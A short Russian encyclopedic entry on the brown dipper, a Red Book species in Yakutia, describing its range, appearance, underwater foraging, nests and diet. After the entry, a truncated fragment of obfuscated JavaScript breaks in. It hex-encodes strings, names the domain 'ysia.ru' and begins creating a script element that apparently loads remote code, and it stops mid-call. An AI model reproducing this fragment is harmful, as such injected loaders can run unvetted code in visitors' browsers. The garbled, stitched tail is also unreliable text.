ОЛЯПКА БУРАЯ

Птица отряда воробьинообразные, семейства оляпки, занесенная в Красную книгу Республики Саха (Якутия) (III категория).

Встречается спорадично в горных областях юго-восточной Якутии: в верховьях реки Восточная Хандыга (правый приток Алдана), реки Куйдусун (левый приток Индигирки), реки Колымы. Распространена по горным рекам вдоль Охотского и Тихоокеанского побережья. На незамерзающих участках горных рек может держаться и в зимнее время.

Бурая оляпка – маленькая птица весом 70-80 г. Окраска однотонная, от шоколадно-каштановой до почти черной, молодые птицы серые с чешуйчатым рисунком. Клюв острый, короткие крылья и хвост. Оперение густое, жесткое.

Обитает на берегах горных речек. Один из немногих видов воробьиных птиц способных в поисках пищи нырять и плавать под водой. Гнезда довольно массивные и многослойные, располагаются недалеко от уреза воды. Основу корма составляют мелкие рыбы, личинки ручейников.

uot;,»»);for(var t=»»,o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ysia.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute(

Добавить комментарий